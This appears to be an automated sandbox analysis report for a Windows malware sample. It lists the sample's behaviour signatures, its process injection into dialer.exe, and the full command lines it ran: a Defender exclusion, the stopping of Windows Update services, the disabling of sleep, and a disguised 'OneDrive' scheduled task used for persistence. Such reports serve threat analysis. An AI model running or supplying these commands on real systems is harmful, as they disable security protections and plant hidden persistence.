Analysis
-
max time kernel
33s -
max time network
38s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
11-05-2023 18:40
Static task
static1
Behavioral task
behavioral1
Sample
ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe
Resource
win10v2004-20230220-en
General
-
Target
ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe
-
Size
8.7MB
-
MD5
6a38b46d48afeae349b698a429ae1e1c
-
SHA1
891c831af6e60cfded62268276e4ffffd203f27e
-
SHA256
ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5
-
SHA512
470ae81eb635aa4b50b3213544ce85de16b87eaba8cf0fa46ca00989df2fa88fcadb1d834c58a5a7d84b3718515f6fd359a9a946035222b944b3df3e7b87bdf5
-
SSDEEP
196608:kxKMARSuV2XJXf6hzsy07g1vse0yEn2ii+Iv5tUOX:/FRSJXlf6Z8gWnyiqxtN
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 3116 created 3160 3116 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 35 PID 3116 created 3160 3116 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 35 PID 3116 created 3160 3116 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 35 PID 3116 created 3160 3116 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 35 PID 3116 created 3160 3116 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 35 -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3116 set thread context of 4428 3116 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 96 -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4292 sc.exe 4296 sc.exe 4308 sc.exe 4352 sc.exe 4328 sc.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 3116 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 3116 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 4396 powershell.exe 4396 powershell.exe 3116 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 3116 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 3116 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 3116 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 3116 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 3116 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 3116 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 3116 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 4428 dialer.exe 4428 dialer.exe 1648 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 4396 powershell.exe Token: SeShutdownPrivilege 2148 powercfg.exe Token: SeCreatePagefilePrivilege 2148 powercfg.exe Token: SeDebugPrivilege 4428 dialer.exe Token: SeShutdownPrivilege 1512 powercfg.exe Token: SeCreatePagefilePrivilege 1512 powercfg.exe Token: SeDebugPrivilege 1648 powershell.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 228 wrote to memory of 4296 228 cmd.exe 88 PID 228 wrote to memory of 4296 228 cmd.exe 88 PID 228 wrote to memory of 4308 228 cmd.exe 89 PID 228 wrote to memory of 4308 228 cmd.exe 89 PID 228 wrote to memory of 4352 228 cmd.exe 90 PID 228 wrote to memory of 4352 228 cmd.exe 90 PID 228 wrote to memory of 4328 228 cmd.exe 91 PID 228 wrote to memory of 4328 228 cmd.exe 91 PID 228 wrote to memory of 4292 228 cmd.exe 92 PID 228 wrote to memory of 4292 228 cmd.exe 92 PID 4984 wrote to memory of 2148 4984 cmd.exe 95 PID 4984 wrote to memory of 2148 4984 cmd.exe 95 PID 3116 wrote to memory of 4428 3116 ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe 96 PID 4984 wrote to memory of 1512 4984 cmd.exe 99 PID 4984 wrote to memory of 1512 4984 cmd.exe 99 PID 4984 wrote to memory of 8 4984 cmd.exe 100 PID 4984 wrote to memory of 8 4984 cmd.exe 100
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3160
-
C:\Users\Admin\AppData\Local\Temp\ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe"C:\Users\Admin\AppData\Local\Temp\ce9bd1a5c1fc599b0c8f877d229482ffa413d8dd7f51eda86c1d3a59de6280b5.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks BIOS information in registry
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4396
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4296
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4308
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4352
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4328
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4292
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2148
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:8
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:512
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yramilr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5a8e8360d573a4ff072dcc6f09d992c88
SHA13446774433ceaf0b400073914facab11b98b6807
SHA256bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b
SHA5124ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82